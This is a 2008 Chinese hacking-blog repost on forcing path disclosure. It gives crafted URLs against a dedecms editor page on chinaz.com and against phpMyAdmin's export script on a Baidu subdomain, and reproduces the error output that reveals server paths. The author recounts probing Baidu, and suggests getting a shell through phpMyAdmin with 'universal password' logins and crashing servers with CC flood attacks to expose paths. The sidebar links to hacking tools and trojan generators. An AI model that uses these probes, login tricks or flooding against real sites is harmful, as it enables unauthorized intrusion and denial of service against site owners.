Nov252008

站长网dedecms爆目录方法

作者:天晴   发布:2008-11-25 07:20   分类:Articles   阅读:   抢沙发  
站长网 dedecms爆目录方法
http://chinaz.com/include/htmledit/index.php?modetype=basic&height[]=airpig
Fatal error: Unsupported operand types in E:2008.chinazincludehtmleditindex.php on line 7
这些都是利用cms漏洞
然后说下Phpmyadmin
这个比较多
基本上用phpmyadmin的站90%都可以爆目录
上次记得搞百度的时候 就发现个 后来管理员改还真快
http://xxxx.baidu.com/...../phpmyadmin/libraries/export/xls.php
Warning: main(Spreadsheet/Excel/Writer.php) [function.main]: failed to open stream: No such file or directory in /home/work/local/apache/htdocs/phpmyadmin/libraries/export/xls.php on line 5
Fatal error: main() [function.require]: Failed opening required ’Spreadsheet/Excel/Writer.php’ (include_path=’.:/home/work/local/php/lib/php’) in /home/work/local/apache/htdocs/phpmyadmin/libraries/export/xls.php on line 5
pphpmyadmin/libraries/export/xls.php
hpmyadmin hemesdarkblue_orangelayout.inc.php 
呵呵目录就出来了  还有如果phpmyadmin 能用万能密码@进去 如果服务器设置不是很得当
然后直接得shell 可惜百度的进不去 挨~~~
除了这些常规方法 上次提过一些极端方法
可以用CC等攻击方法 让拖跨服务器
可以爆出路径

文章来源于网络

本文固定链接: http://www.daopo.org/2008/11/25/contact-us-domain-dedecms-burst-catalog-methods/ | 天晴轩

该日志由 天晴 于2008年11月25日发表在 Articles 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 站长网dedecms爆目录方法 | 天晴轩
关键字: , ,
【上一篇】
【下一篇】

您可能还会对这些文章感兴趣!

    1. 多功能Hack工具箱
    2. Avira AntiVir PersonalEdition Premium fo
    3. 135抓鸡快手3.0破解优化版-PaniDlg
    4. Windows XP with SP3 VOL MSDN┊种子
    5. 对于速展的空间真的是无语了
    6. [06.01]nod32最新升级id(1)
    7. MaxHijack经典版
    8. 王晶最新电影[金钱帝国]高清下载(1)
    9. 凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏
    10. avast! Professional Edition(杀毒软件)V4.7.1
    11. 简单五步骤预防AV终结者病毒
    12. 对最新flash-0day网马分析!
    13. 黑鹰网马生成器
    14. [仙剑奇侠传三][国语高清37集全](1)
    15. Windows 7 RTM Build 7264+官方中文语言包下(1)
    16. 腾讯QQ2006 Final 飘云版 V3.80

站长网dedecms爆目录方法:等您坐沙发呢!

发表评论

快捷键:Ctrl+Enter